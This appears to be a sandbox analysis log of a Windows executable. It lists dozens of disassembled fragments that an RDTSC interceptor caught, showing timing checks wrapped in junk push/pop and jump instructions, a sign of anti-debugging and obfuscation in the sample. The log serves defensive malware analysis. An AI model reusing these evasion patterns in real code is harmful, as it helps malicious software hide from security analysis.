Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02B5 second address: BB02C6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC22D01ECCEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02C6 second address: BB02CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02CC second address: BB02D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FC22D01ECC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB08C6 second address: BB08CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB08CB second address: BB08EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC22D01ECC6h 0x0000000a jmp 00007FC22D01ECD9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB08EE second address: BB0902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC22CC1B8AAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB0902 second address: BB0911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB54F5 second address: BB550A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB550A second address: BB5510 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB5510 second address: BB5554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC22CC1B8B9h 0x0000000c jmp 00007FC22CC1B8ADh 0x00000011 jns 00007FC22CC1B8A6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC22CC1B8ACh 0x0000001e jmp 00007FC22CC1B8B7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61776 second address: B6177C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6177C second address: B61801 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, dword ptr [ebp+1248B8E2h] 0x00000011 mov edi, dword ptr [ebp+12457ACAh] 0x00000017 add eax, ebx 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FC22CC1B8A8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov edi, ebx 0x00000035 push eax 0x00000036 jnl 00007FC22CC1B8B4h 0x0000003c mov dword ptr [esp], eax 0x0000003f jmp 00007FC22CC1B8B0h 0x00000044 jmp 00007FC22CC1B8AFh 0x00000049 push 00000004h 0x0000004b js 00007FC22CC1B8ACh 0x00000051 sub dword ptr [ebp+122D261Eh], esi 0x00000057 nop 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push edi 0x0000005c pop edi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB644E second address: BB645E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 js 00007FC22D01ECEAh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB645E second address: BB6464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB6464 second address: BB6468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA6E7 second address: BBA702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA702 second address: BBA72A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 ja 00007FC22D01ECC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007FC22D01ECD2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA72A second address: BBA738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA738 second address: BBA73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA73E second address: BBA742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA742 second address: BBA746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB9B25 second address: BB9B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB9B2E second address: BB9B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB9B34 second address: BB9B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBBE9A second address: BBBEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBBEA3 second address: BBBEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC4170 second address: BC4187 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC22D01ECCDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC4187 second address: BC418B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2181 second address: BC2187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2187 second address: BC218D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC218D second address: BC2195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2757 second address: BC2775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007FC22CC1B8B2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2CF9 second address: BC2CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2CFE second address: BC2D0E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007FC22CC1B8A6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2D0E second address: BC2D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC32C1 second address: BC32C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC32C7 second address: BC3306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FC22D01ECD3h 0x00000010 jmp 00007FC22D01ECCEh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007FC22D01ECC6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC3306 second address: BC330A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC330A second address: BC3310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC3310 second address: BC3333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC22CC1B8B8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C1A second address: BC8C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C2B second address: BC8C39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C39 second address: BC8C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C3F second address: BC8C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C45 second address: BC8C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCBE06 second address: BCBE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC22CC1B8A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCBF5B second address: BCBF5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCBF5F second address: BCBF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC22CC1B8A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC09D second address: BCC0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC0A3 second address: BCC0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B7h 0x00000009 popad 0x0000000a jmp 00007FC22CC1B8B1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC222 second address: BCC252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC22D01ECD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC37B second address: BCC381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC655 second address: BCC65C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD45E0 second address: BD45E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD329A second address: BD32A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD32A0 second address: BD32A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD2341 second address: BD2358 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC22D01ECCEh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD2358 second address: BD2370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD9D8D second address: BD9D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD9D91 second address: BD9DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD9DAD second address: BD9DC9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC22D01ECD2h 0x00000008 jc 00007FC22D01ECE5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BDCC66 second address: BDCC6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BDCC6A second address: BDCC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE09D4 second address: BE09DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE09DA second address: BE09DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE09DE second address: BE0A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC22CC1B8C0h 0x0000000c jmp 00007FC22CC1B8B8h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jc 00007FC22CC1B8C0h 0x0000001a pushad 0x0000001b jc 00007FC22CC1B8A6h 0x00000021 jng 00007FC22CC1B8A6h 0x00000027 jc 00007FC22CC1B8A6h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2E3E second address: BE2E57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2C92 second address: BE2CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2CAC second address: BE2CC2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22D01ECC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2CC2 second address: BE2CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2CC8 second address: BE2CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF87E second address: BEF882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF882 second address: BEF886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF886 second address: BEF8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC22CC1B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC22CC1B8B0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF8A2 second address: BEF8F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD8h 0x00000008 jmp 00007FC22D01ECD9h 0x0000000d jmp 00007FC22D01ECD8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF42A second address: BEF43D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8ADh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF43D second address: BEF441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFAAFB second address: BFAB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFAB05 second address: BFAB0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFAB0A second address: BFAB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFC19D second address: BFC1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF2F second address: C0DF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FC22CC1B8A6h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF5A second address: C0DF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF5E second address: C0DF6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF6C second address: C0DF8F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC22D01ECD9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF8F second address: C0DF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0C862 second address: C0C884 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC22D01ECC6h 0x00000008 jmp 00007FC22D01ECD3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0C884 second address: C0C88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0CB14 second address: C0CB1E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22D01ECCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0CDB1 second address: C0CDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 jl 00007FC22CC1B8AAh 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC22CC1B8B7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DC78 second address: C0DC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C11607 second address: C11612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BBEB second address: C2BC18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC22D01ECCEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECD9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BC18 second address: C2BC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
